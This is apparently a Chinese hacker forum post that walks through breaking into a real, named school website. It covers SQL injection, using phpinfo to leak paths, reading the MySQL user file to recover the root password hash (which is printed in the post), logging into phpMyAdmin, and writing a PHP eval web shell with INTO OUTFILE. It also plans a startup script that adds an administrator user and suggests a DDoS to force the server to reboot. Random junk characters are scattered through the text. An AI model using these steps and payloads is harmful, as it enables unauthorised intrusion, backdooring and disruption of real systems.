友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
+ m( g& \" J1 i6 Y发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！



' ^$ }& X5 u* h" a& M常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

% |. z1 c  m& h" [+ Q" R$ g+ }8 G2 S5 H那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

% z' W' B5 {: B# |5 p试着爆绝对路径：
  O: F. a8 D8 ]( O; G1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
  O, Q  I2 ?. x3./load_file()  
  `5 c: e: Z$ F/ E. y4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
+ r. u! d/ c7 l$ `7 Z; q7 w5./phpmyadmin/libraries/select_lang.lib.php  
2 ?' y2 b, g, [6./phpmyadmin/libraries/lect_lang.lib.php  
8 M% J, t; |1 v. e- y7./phpmyadmin/libraries/mcrypt.lib.php   
, {3 A" r- ]+ C* [+ n7 D  \6 E8./phpmyadmin/libraries/export/xls.php  

& h1 U% S& Z/ ~" h9 O; E) G均不行...........................

# ^& a0 F6 ~8 T9 {7 R0 @9 I御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
& W" H: G. S- ?  Z1 y4 f! E
: C5 X, H4 |0 {5 X; p! Q6 C: I  p权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败
; E0 G2 E' m8 v! K
敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........

" t4 B: B: _- m( B) J8 N3 Y想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
+ {# N  }- N: V+ B4 }' ^
4 P2 T. \" o& D! }' P自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD
+ ^* h6 e4 }( F. J* s
成功读到root密码：

* T5 I) |6 J3 r# [/ t) E17---- r(0072)
$ N3 O. t3 U( }* r18---- o(006f)
19---- o(006f)
20---- t(0074)
21---- *(002a)
22---- 8(0038)
23---- 2(0032)
24---- E(0045)
0 d5 k6 h" q7 s5 b$ [# R3 T( K25---- 1(0031)
! `, ~5 b0 o3 ]9 X1 ~26---- C(0043)
3 A4 t+ N7 l& ]! x! y27---- 5(0035)
, p+ A  V9 t7 {( i9 `9 h: y28---- 8(0038)
3 ?& s  m4 ]# k# |. ~29---- 2(0032)
, ?4 ]; |$ |/ F30---- 8(0038)
( w% L( Z- |# Q31---- A(0041)
32---- 9(0039)
33---- B(0042)
% K6 R1 I* s# L+ J  \3 w9 H5 B34---- 5(0035)
35---- 4(0034)
36---- 8(0038)
37---- 6(0036)
, Q. p, b' a/ |38---- 4(0034)
/ f7 x5 Y  U# J39---- 9(0039)
( \( R1 V  N, b9 u2 k1 C& [3 }40---- 1(0031)
41---- 1(0031)
42---- 5(0035)
$ r' \2 u9 @: S1 s2 D43---- 3(0033)
44---- 5(0035)
45---- 9(0039)
$ P4 I# G6 V! `* L46---- 8(0038)
8 ?0 \  @3 |. m1 E: B: c) f47---- F(0046)
48---- F(0046)
) A6 R. R% r3 h" m2 k49---- 4(0034)
50---- F(0046)
51---- 0(0030)
( P7 C& Y& G  l" D3 J52---- 3(0033)
" [* |( T0 M  B53---- 2(0032)
  q' N7 |/ e/ b' x) {* R& F5 @54---- A(0041)
. \1 J2 x3 {, H4 {2 g( V# ?55---- 4(0034)
# d. {+ ^  p: d' c; ?, x56---- A(0041)
0 b8 q0 {6 z. R57---- B(0042)
58---- *(0044)
59---- *(0035)
4 ?' J1 u  i' J1 b60---- *(0041)
' N3 |& ?* m7 c61---- *0032)

解密后成功登陆phpmyamin
, I6 ]; S# ?! i! e2 g! `1 H                          

2 ^$ W" Y( q+ K( A5 s# s+ N7 n                             
# \; z- z8 B+ W' r2 L) v* d
找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
$ w3 \! F# j1 B0 F" F5 n5 g
成功执行，拿下shell，菜刀连接：

服务器不支持asp,aspx,php提权无果...................

但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

$ H2 n+ r8 Z- q- d

成员

-------------------------------------------------------------------------------
admin
1 W/ i- {6 `1 g+ l3 Q7 q( q- VAdministrator
slipper$
sqluser
命令成功完成。

服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

ddos服务器重启，不然就只能坐等服务器重启了...............................
0 o+ d, q- x( j; m+ l0 b5 e+ @
! a% U- N0 M5 o' {      

angel